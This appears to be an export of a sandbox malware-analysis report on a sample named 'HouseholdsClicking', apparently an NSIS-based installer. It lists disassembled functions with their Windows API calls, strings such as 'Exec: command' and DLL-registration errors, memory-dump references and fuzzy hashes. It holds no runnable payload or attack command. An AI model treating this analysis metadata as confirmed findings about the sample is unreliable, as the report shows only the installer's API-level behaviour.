                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                            • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                            • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                            • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                            • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                            Strings
                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                            Strings
                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                            • String ID: f
                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                            APIs
                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                            • MulDiv.KERNEL32(0000F400,00000064,00100D29), ref: 00403295
                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                            Strings
                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                            APIs
                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                            • GlobalFree.KERNEL32(00837B30), ref: 00402387
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$TournamentsDefenceBerry
                                                                                                                                            • API String ID: 1459762280-2197395026
                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                            APIs
                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                            • GlobalFree.KERNEL32(00837B30), ref: 00402387
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                            APIs
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
